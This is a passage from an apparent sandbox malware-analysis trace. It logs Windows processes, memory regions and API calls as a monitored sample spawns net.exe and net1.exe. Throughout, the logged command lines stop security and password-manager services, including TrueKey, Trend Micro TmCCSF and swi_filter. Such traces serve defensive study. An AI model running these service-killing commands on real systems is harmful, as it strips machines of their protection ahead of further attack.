(hFile=0xb) returned 0x2 [0116.480] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb38 | out: lpMode=0x1afb38) returned 1 [0116.480] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1afb30, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x1afb30*=0x34) returned 1 [0116.480] GetFileType (hFile=0xb) returned 0x2 [0116.480] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb38 | out: lpMode=0x1afb38) returned 1 [0116.481] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afb30, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x1afb30*=0x2) returned 1 [0116.481] NetApiBufferFree (Buffer=0x374d50) returned 0x0 [0116.481] NetApiBufferFree (Buffer=0x37c0f0) returned 0x0 [0116.481] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_filter /y" [0116.481] exit (_Code=2) Process: id = "324" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x521ef000" os_pid = "0x7e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop TrueKeyScheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11490 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11491 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11492 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11493 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11494 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11495 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11496 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11497 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11498 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11499 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11500 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 11501 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 843 os_tid = 0xbd4 Process: id = "325" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5fdc4000" os_pid = "0x24c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "316" os_parent_pid = "0x1288" cmd_line = "C:\\Windows\\system32\\net1 stop swi_update_64 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11528 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11529 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11530 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11531 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 11532 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11533 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11534 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11535 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11536 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11537 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11538 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 11539 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11584 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11585 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 11586 start_va = 0x220000 end_va = 0x286fff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11587 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11588 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11589 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11590 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11591 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11592 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 11593 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 11594 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11595 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11596 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11597 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11598 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11599 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11600 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11601 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11602 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11603 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11604 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11605 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11606 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11607 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11608 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11609 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11610 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 845 os_tid = 0x1348 [0116.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fbf0 | out: lpSystemTimeAsFileTime=0x10fbf0*(dwLowDateTime=0xfa985db0, dwHighDateTime=0x1d48689)) [0116.531] GetCurrentProcessId () returned 0x24c [0116.531] GetCurrentThreadId () returned 0x1348 [0116.531] GetTickCount () returned 0x26ce5 [0116.531] QueryPerformanceCounter (in: lpPerformanceCount=0x10fbf8 | out: lpPerformanceCount=0x10fbf8*=1816344900000) returned 1 [0116.532] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0116.532] __set_app_type (_Type=0x1) [0116.532] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0116.532] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0116.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.533] GetConsoleOutputCP () returned 0x1b5 [0116.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0116.533] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.535] sprintf_s (in: _DstBuf=0x10fb98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.535] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.537] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.537] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0116.537] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update_64 /y" [0116.537] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f930, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0116.537] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.538] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fb88 | out: Buffer=0x10fb88*=0x134d50) returned 0x0 [0116.538] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fb88 | out: Buffer=0x10fb88*=0x13c100) returned 0x0 [0116.538] _fileno (_File=0x7fefdba2a80) returned 0 [0116.538] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0116.539] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.539] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.539] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.539] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.539] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.539] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.539] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.539] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.539] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.539] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.539] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.539] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.539] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.539] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.539] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.539] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.539] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.539] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.539] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.540] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.540] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.540] _wcsicmp (_String1="accounts", _String2="swi_update_64") returned -18 [0116.540] _wcsicmp (_String1="computer", _String2="swi_update_64") returned -16 [0116.540] _wcsicmp (_String1="config", _String2="swi_update_64") returned -16 [0116.540] _wcsicmp (_String1="continue", _String2="swi_update_64") returned -16 [0116.540] _wcsicmp (_String1="cont", _String2="swi_update_64") returned -16 [0116.540] _wcsicmp (_String1="file", _String2="swi_update_64") returned -13 [0116.540] _wcsicmp (_String1="files", _String2="swi_update_64") returned -13 [0116.540] _wcsicmp (_String1="group", _String2="swi_update_64") returned -12 [0116.540] _wcsicmp (_String1="groups", _String2="swi_update_64") returned -12 [0116.540] _wcsicmp (_String1="help", _String2="swi_update_64") returned -11 [0116.540] _wcsicmp (_String1="helpmsg", _String2="swi_update_64") returned -11 [0116.540] _wcsicmp (_String1="localgroup", _String2="swi_update_64") returned -7 [0116.540] _wcsicmp (_String1="pause", _String2="swi_update_64") returned -3 [0116.540] _wcsicmp (_String1="session", _String2="swi_update_64") returned -18 [0116.540] _wcsicmp (_String1="sessions", _String2="swi_update_64") returned -18 [0116.540] _wcsicmp (_String1="sess", _String2="swi_update_64") returned -18 [0116.541] _wcsicmp (_String1="share", _String2="swi_update_64") returned -15 [0116.541] _wcsicmp (_String1="start", _String2="swi_update_64") returned -3 [0116.541] _wcsicmp (_String1="stats", _String2="swi_update_64") returned -3 [0116.541] _wcsicmp (_String1="statistics", _String2="swi_update_64") returned -3 [0116.541] _wcsicmp (_String1="stop", _String2="swi_update_64") returned -3 [0116.541] _wcsicmp (_String1="time", _String2="swi_update_64") returned 1 [0116.541] _wcsicmp (_String1="user", _String2="swi_update_64") returned 2 [0116.541] _wcsicmp (_String1="users", _String2="swi_update_64") returned 2 [0116.541] _wcsicmp (_String1="msg", _String2="swi_update_64") returned -6 [0116.541] _wcsicmp (_String1="messenger", _String2="swi_update_64") returned -6 [0116.541] _wcsicmp (_String1="receiver", _String2="swi_update_64") returned -1 [0116.541] _wcsicmp (_String1="rcv", _String2="swi_update_64") returned -1 [0116.541] _wcsicmp (_String1="netpopup", _String2="swi_update_64") returned -5 [0116.541] _wcsicmp (_String1="redirector", _String2="swi_update_64") returned -1 [0116.541] _wcsicmp (_String1="redir", _String2="swi_update_64") returned -1 [0116.541] _wcsicmp (_String1="rdr", _String2="swi_update_64") returned -1 [0116.541] _wcsicmp (_String1="workstation", _String2="swi_update_64") returned 4 [0116.541] _wcsicmp (_String1="work", _String2="swi_update_64") returned 4 [0116.541] _wcsicmp (_String1="wksta", _String2="swi_update_64") returned 4 [0116.541] _wcsicmp (_String1="prdr", _String2="swi_update_64") returned -3 [0116.542] _wcsicmp (_String1="devrdr", _String2="swi_update_64") returned -15 [0116.542] _wcsicmp (_String1="lanmanworkstation", _String2="swi_update_64") returned -7 [0116.542] _wcsicmp (_String1="server", _String2="swi_update_64") returned -18 [0116.542] _wcsicmp (_String1="svr", _String2="swi_update_64") returned -1 [0116.542] _wcsicmp (_String1="srv", _String2="swi_update_64") returned -5 [0116.542] _wcsicmp (_String1="lanmanserver", _String2="swi_update_64") returned -7 [0116.542] _wcsicmp (_String1="alerter", _String2="swi_update_64") returned -18 [0116.542] _wcsicmp (_String1="netlogon", _String2="swi_update_64") returned -5 [0116.542] _wcsupr (in: _String="swi_update_64" | out: _String="SWI_UPDATE_64") returned="SWI_UPDATE_64" [0116.542] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x13ce10 [0116.548] GetServiceKeyNameW (in: hSCManager=0x13ce10, lpDisplayName="SWI_UPDATE_64", lpServiceName=0xffe15750, lpcchBuffer=0x10faa8 | out: lpServiceName="", lpcchBuffer=0x10faa8) returned 0 [0116.549] _wcsicmp (_String1="msg", _String2="SWI_UPDATE_64") returned -6 [0116.549] _wcsicmp (_String1="messenger", _String2="SWI_UPDATE_64") returned -6 [0116.549] _wcsicmp (_String1="receiver", _String2="SWI_UPDATE_64") returned -1 [0116.549] _wcsicmp (_String1="rcv", _String2="SWI_UPDATE_64") returned -1 [0116.549] _wcsicmp (_String1="redirector", _String2="SWI_UPDATE_64") returned -1 [0116.549] _wcsicmp (_String1="redir", _String2="SWI_UPDATE_64") returned -1 [0116.549] _wcsicmp (_String1="rdr", _String2="SWI_UPDATE_64") returned -1 [0116.549] _wcsicmp (_String1="workstation", _String2="SWI_UPDATE_64") returned 4 [0116.549] _wcsicmp (_String1="work", _String2="SWI_UPDATE_64") returned 4 [0116.549] _wcsicmp (_String1="wksta", _String2="SWI_UPDATE_64") returned 4 [0116.549] _wcsicmp (_String1="prdr", _String2="SWI_UPDATE_64") returned -3 [0116.549] _wcsicmp (_String1="devrdr", _String2="SWI_UPDATE_64") returned -15 [0116.550] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_UPDATE_64") returned -7 [0116.550] _wcsicmp (_String1="server", _String2="SWI_UPDATE_64") returned -18 [0116.550] _wcsicmp (_String1="svr", _String2="SWI_UPDATE_64") returned -1 [0116.550] _wcsicmp (_String1="srv", _String2="SWI_UPDATE_64") returned -5 [0116.550] _wcsicmp (_String1="lanmanserver", _String2="SWI_UPDATE_64") returned -7 [0116.550] _wcsicmp (_String1="alerter", _String2="SWI_UPDATE_64") returned -18 [0116.550] _wcsicmp (_String1="netlogon", _String2="SWI_UPDATE_64") returned -5 [0116.550] NetServiceControl (in: servername=0x0, service="SWI_UPDATE_64", opcode=0x0, arg=0x0, bufptr=0x10fab0 | out: bufptr=0x10fab0) returned 0x889 [0116.551] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.551] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0116.552] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0116.573] GetFileType (hFile=0xb) returned 0x2 [0116.573] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0116.573] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x10f970*=0x1e) returned 1 [0116.574] GetFileType (hFile=0xb) returned 0x2 [0116.574] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0116.574] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x10f970*=0x2) returned 1 [0116.575] _ultow (in: _Dest=0x889, _Radix=1112544 | out: _Dest=0x889) returned="2185" [0116.575] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0116.575] GetFileType (hFile=0xb) returned 0x2 [0116.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0116.575] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x10f970*=0x34) returned 1 [0116.576] GetFileType (hFile=0xb) returned 0x2 [0116.576] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0116.576] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x10f970*=0x2) returned 1 [0116.577] NetApiBufferFree (Buffer=0x134d50) returned 0x0 [0116.577] NetApiBufferFree (Buffer=0x13c100) returned 0x0 [0116.577] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update_64 /y" [0116.577] exit (_Code=2) Process: id = "326" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x50c22000" os_pid = "0x528" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop TrueKeyServiceHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11540 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11541 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11542 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11543 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11544 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11545 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11546 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11547 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11548 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11549 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11550 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 11551 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 846 os_tid = 0xc60 Process: id = "327" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x52524000" os_pid = "0x5e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "317" os_parent_pid = "0xa18" cmd_line = "C:\\Windows\\system32\\net1 stop TmCCSF /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11552 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11553 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11554 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11555 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 11556 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = 